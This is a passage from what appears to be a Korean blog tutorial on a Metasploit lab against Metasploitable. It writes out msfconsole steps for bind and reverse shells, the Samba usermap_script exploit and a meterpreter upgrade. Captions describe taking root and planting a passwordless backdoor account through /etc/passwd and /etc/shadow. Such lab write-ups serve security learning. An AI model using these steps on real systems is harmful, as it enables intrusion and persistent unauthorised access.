&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;set payload cmd/unix/&lt;span style=&quot;color: #ee2323;&quot;&gt;reverse_ruby&lt;/span&gt; (방화벽이 닫혀있을때 사용, 공격 대상자가 공격자에게 접근을 유도한다.)&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;194&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ckmppi/btrYzoCzSqi/I1vGHs2dQaYGE5wVjGrgPk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ckmppi/btrYzoCzSqi/I1vGHs2dQaYGE5wVjGrgPk/img.png&quot; data-alt=&quot;공격 대상의 shell환경에 침투 하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ckmppi/btrYzoCzSqi/I1vGHs2dQaYGE5wVjGrgPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fckmppi%2FbtrYzoCzSqi%2FI1vGHs2dQaYGE5wVjGrgPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;952&quot; height=&quot;194&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;194&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상의 shell환경에 침투 하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;402&quot; data-origin-height=&quot;157&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YK7VS/btrYyUhwX7i/6UQu1SPNferFqKIjRubgCk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YK7VS/btrYyUhwX7i/6UQu1SPNferFqKIjRubgCk/img.png&quot; data-alt=&quot;제한적이지만 공격대상자의 pc를 조작할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YK7VS/btrYyUhwX7i/6UQu1SPNferFqKIjRubgCk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYK7VS%2FbtrYyUhwX7i%2F6UQu1SPNferFqKIjRubgCk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;402&quot; height=&quot;157&quot; data-origin-width=&quot;402&quot; data-origin-height=&quot;157&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;제한적이지만 공격대상자의 pc를 조작할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;719&quot; data-origin-height=&quot;113&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b6TZRo/btrYzpnZIPc/KmOzRkobeBaQEHSSBAnxw1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b6TZRo/btrYzpnZIPc/KmOzRkobeBaQEHSSBAnxw1/img.png&quot; data-alt=&quot;공격 대상자 PC에서 netstat명령어로 사용중인 port를 확인하여 의심가는 port로 침해가 되었는지 확인할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b6TZRo/btrYzpnZIPc/KmOzRkobeBaQEHSSBAnxw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb6TZRo%2FbtrYzpnZIPc%2FKmOzRkobeBaQEHSSBAnxw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;719&quot; height=&quot;113&quot; data-origin-width=&quot;719&quot; data-origin-height=&quot;113&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자 PC에서 netstat명령어로 사용중인 port를 확인하여 의심가는 port로 침해가 되었는지 확인할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;meterpreter&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;863&quot; data-origin-height=&quot;207&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bFIfOr/btrYEiOphgF/T7q8vapap1rSUipWuMjBw1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bFIfOr/btrYEiOphgF/T7q8vapap1rSUipWuMjBw1/img.png&quot; data-alt=&quot;ctlr + z 로 전에 shell 침투를 백그라운드로 보내고 meterpreter환경을 실행한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFIfOr/btrYEiOphgF/T7q8vapap1rSUipWuMjBw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFIfOr%2FbtrYEiOphgF%2FT7q8vapap1rSUipWuMjBw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;863&quot; height=&quot;207&quot; data-origin-width=&quot;863&quot; data-origin-height=&quot;207&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;ctlr + z 로 전에 shell 침투를 백그라운드로 보내고 meterpreter환경을 실행한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;shell_to_meterpreter는 일종의 악종코드인데 사전에 준비된 세션에 적용 시킬 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1136&quot; data-origin-height=&quot;388&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BxWas/btrYzlsvLMm/tzzj8MS70eDs9bUn6qlMZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BxWas/btrYzlsvLMm/tzzj8MS70eDs9bUn6qlMZk/img.png&quot; data-alt=&quot;session2가 만들어 졌다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BxWas/btrYzlsvLMm/tzzj8MS70eDs9bUn6qlMZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBxWas%2FbtrYzlsvLMm%2Ftzzj8MS70eDs9bUn6qlMZk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1136&quot; height=&quot;388&quot; data-origin-width=&quot;1136&quot; data-origin-height=&quot;388&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;session2가 만들어 졌다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;521&quot; data-origin-height=&quot;87&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dotX7E/btrYy9Msp04/cds3m7PYKcrAwkYCu6FlF1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dotX7E/btrYy9Msp04/cds3m7PYKcrAwkYCu6FlF1/img.png&quot; data-alt=&quot;sessions 2를 입력하여 meterpreter 사용 한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dotX7E/btrYy9Msp04/cds3m7PYKcrAwkYCu6FlF1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdotX7E%2FbtrYy9Msp04%2Fcds3m7PYKcrAwkYCu6FlF1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;521&quot; height=&quot;87&quot; data-origin-width=&quot;521&quot; data-origin-height=&quot;87&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sessions 2를 입력하여 meterpreter 사용 한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/oosAK/btrYzKL9tHW/jW2dGERK5xNfnm904dJqn0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/oosAK/btrYzKL9tHW/jW2dGERK5xNfnm904dJqn0/img.png&quot; data-origin-width=&quot;755&quot; data-origin-height=&quot;673&quot; data-is-animation=&quot;false&quot; style=&quot;width: 47.5418%; margin-right: 10px;&quot; data-widthpercent=&quot;48.1&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/oosAK/btrYzKL9tHW/jW2dGERK5xNfnm904dJqn0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoosAK%2FbtrYzKL9tHW%2FjW2dGERK5xNfnm904dJqn0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;755&quot; height=&quot;673&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NHyGb/btrYzqAo9ol/prmHEh5ZlYJMmsZgize8qK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NHyGb/btrYzqAo9ol/prmHEh5ZlYJMmsZgize8qK/img.png&quot; data-origin-width=&quot;581&quot; data-origin-height=&quot;480&quot; data-is-animation=&quot;false&quot; data-widthpercent=&quot;51.9&quot; style=&quot;width: 51.2954%;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NHyGb/btrYzqAo9ol/prmHEh5ZlYJMmsZgize8qK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNHyGb%2FbtrYzqAo9ol%2FprmHEh5ZlYJMmsZgize8qK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;581&quot; height=&quot;480&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Y4JfJ/btrYEh21Bg5/aV4KVlW4UVLDEudUgJhws0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Y4JfJ/btrYEh21Bg5/aV4KVlW4UVLDEudUgJhws0/img.png&quot; data-origin-width=&quot;630&quot; data-origin-height=&quot;836&quot; data-is-animation=&quot;false&quot; style=&quot;width: 28.9947%; margin-right: 10px;&quot; data-widthpercent=&quot;29.34&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Y4JfJ/btrYEh21Bg5/aV4KVlW4UVLDEudUgJhws0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FY4JfJ%2FbtrYEh21Bg5%2FaV4KVlW4UVLDEudUgJhws0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;836&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/4zqMH/btrYDeZC8Eb/i53qiD7LJRklpDfndjnlJK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/4zqMH/btrYDeZC8Eb/i53qiD7LJRklpDfndjnlJK/img.png&quot; data-origin-width=&quot;619&quot; data-origin-height=&quot;341&quot; data-is-animation=&quot;false&quot; style=&quot;width: 69.8425%;&quot; data-widthpercent=&quot;70.66&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/4zqMH/btrYDeZC8Eb/i53qiD7LJRklpDfndjnlJK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F4zqMH%2FbtrYDeZC8Eb%2Fi53qiD7LJRklpDfndjnlJK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;619&quot; height=&quot;341&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;?를 입력하여 사용법을 알 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;&amp;nbsp;l이 붙은 명령어는 local컴퓨터를 조작하는 명령어이다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Kali(Local)&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Metaploitable(Remote)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ls&amp;nbsp; &amp;nbsp; -&amp;gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;lt;- lls&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;- lcd&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;cd&amp;nbsp; &amp;nbsp;-&amp;gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;arp (Address Resolution Protocol) : 주소 해결 프로토콜&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IP Address&amp;nbsp; Mac Address&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;864&quot; data-origin-height=&quot;286&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eit6iV/btrYzLYASE9/n2qOjJ70I6Z5JeSZgkyJD0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eit6iV/btrYzLYASE9/n2qOjJ70I6Z5JeSZgkyJD0/img.png&quot; data-alt=&quot;session을 나올땐 exit를 하고 깨끗한 환경에서 다시 사용하기 위해 back과 exit -y로 msfconsole을 종료해준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eit6iV/btrYzLYASE9/n2qOjJ70I6Z5JeSZgkyJD0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Feit6iV%2FbtrYzLYASE9%2Fn2qOjJ70I6Z5JeSZgkyJD0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;864&quot; height=&quot;286&quot; data-origin-width=&quot;864&quot; data-origin-height=&quot;286&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;session을 나올땐 exit를 하고 깨끗한 환경에서 다시 사용하기 위해 back과 exit -y로 msfconsole을 종료해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;usermap_script.rb 모듈을 이용한 침투&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 모듈은 osvdb-34700/cve-2007-1547 취약점에 기반한 침투 모듈이다. 삼바에서 발생한 구조적 속성을 악용해 공격자가 원격에서 악성 코드를 실행시킬 수 있다. 해당 취약점은 삼바 3.0.20 버전에서 3.0.25rc3 버전까지 실행이 가능하다고 알려졌다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1106&quot; data-origin-height=&quot;215&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/XsvfQ/btrYBV66tbW/ch22nQRZKG1VW7cSpde6i0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/XsvfQ/btrYBV66tbW/ch22nQRZKG1VW7cSpde6i0/img.png&quot; data-alt=&quot;usermap_script.rb 모듈 정보&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/XsvfQ/btrYBV66tbW/ch22nQRZKG1VW7cSpde6i0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FXsvfQ%2FbtrYBV66tbW%2Fch22nQRZKG1VW7cSpde6i0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1106&quot; height=&quot;215&quot; data-origin-width=&quot;1106&quot; data-origin-height=&quot;215&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;usermap_script.rb 모듈 정보&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;정방향(방화벽이 열려있을때)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 &amp;gt; use exploit/취약점 모듈&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점모듈) &amp;gt; use payload 악성코드/bind_ruby or bind_tcp&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점모듈) &amp;gt; set rhost 공격대상자ip&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점모듈) &amp;gt; exploit&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;역방향(방화벽이 닫혀있을때)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 &amp;gt; use exploit/취약점 모듈&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점 모듈) &amp;gt; use payload 악성코드/reverse_ruby or reverse_tcp&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점 모듈) &amp;gt; set rhost 공격대상자ip&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점 모듈) &amp;gt; set lhost 공격자ip&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점 모듈) &amp;gt; set lport 공격자port번호&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msf6 exploit(취약점모듈) &amp;gt; exploit&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;953&quot; data-origin-height=&quot;285&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YqVYl/btrYwmL8Nst/KerNxC46Mvg648QE3WdPw0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YqVYl/btrYwmL8Nst/KerNxC46Mvg648QE3WdPw0/img.png&quot; data-alt=&quot;root계정을 탈취하여 침투에 성공 하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YqVYl/btrYwmL8Nst/KerNxC46Mvg648QE3WdPw0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYqVYl%2FbtrYwmL8Nst%2FKerNxC46Mvg648QE3WdPw0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;953&quot; height=&quot;285&quot; data-origin-width=&quot;953&quot; data-origin-height=&quot;285&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;root계정을 탈취하여 침투에 성공 하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;210&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NFIHR/btrYBzpDa25/8ZKX7gwTxepJOK9n3p2wdk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NFIHR/btrYBzpDa25/8ZKX7gwTxepJOK9n3p2wdk/img.png&quot; data-alt=&quot;echo를 이용하여 cat &amp;amp;gt; /etc/passwd에 입력해주면 계정이 생성된다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NFIHR/btrYBzpDa25/8ZKX7gwTxepJOK9n3p2wdk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNFIHR%2FbtrYBzpDa25%2F8ZKX7gwTxepJOK9n3p2wdk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;647&quot; height=&quot;210&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;210&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;echo를 이용하여 cat &amp;gt; /etc/passwd에 입력해주면 계정이 생성된다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;930&quot; data-origin-height=&quot;900&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/F9lhP/btrYzKlaaAn/gOYNXFXrI4owH2jkz5Rnuk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/F9lhP/btrYzKlaaAn/gOYNXFXrI4owH2jkz5Rnuk/img.png&quot; data-alt=&quot;공격자 pc에서도 echo를 실행했을때 적용이 되는 것을 확인할 수 있다. 침투에 사용할 hack계정을 passwd파일에 입력하여 생성하고 hack의 비밀번호를 ::로 설정하여 shadow파일에 입력한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/F9lhP/btrYzKlaaAn/gOYNXFXrI4owH2jkz5Rnuk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FF9lhP%2FbtrYzKlaaAn%2FgOYNXFXrI4owH2jkz5Rnuk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;930&quot; height=&quot;900&quot; data-origin-width=&quot;930&quot; data-origin-height=&quot;900&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격자 pc에서도 echo를 실행했을때 적용이 되는 것을 확인할 수 있다. 침투에 사용할 hack계정을 passwd파일에 입력하여 생성하고 hack의 비밀번호를 ::로 설정하여 shadow파일에 입력한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;713&quot; data-origin-height=&quot;689&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/s89WZ/btrYy9Mt2EQ/Jrs7njAKPMN4pjFfvkw851/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/s89WZ/btrYy9Mt2EQ/Jrs7njAKPMN4pjFfvkw851/img.png&quot; data-alt=&quot;공격자 pc를 하나더 실행하여 텔넷으로 공격대상pc를 텔넷으로 접근하면 echo로 생성한 hack 계정으로 비밀번호 없이 침투가 가능하고 root계정을 탈취하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/s89WZ/btrYy9Mt2EQ/Jrs7njAKPMN4pjFfvkw851/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fs89WZ%2FbtrYy9Mt2EQ%2FJrs7njAKPMN4pjFfvkw851%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;713&quot; height=&quot;689&quot; data-origin-width=&quot;713&quot; data-origin-height=&quot;689&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격자 pc를 하나더 실행하여 텔넷으로 공격대상pc를 텔넷으로 접근하면 echo로 생성한 hack 계정으로 비밀번호 없이 침투가 가능하고 root계정을 탈취하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;미터프리터 방식&lt;/b&gt;&lt;/p&gt;
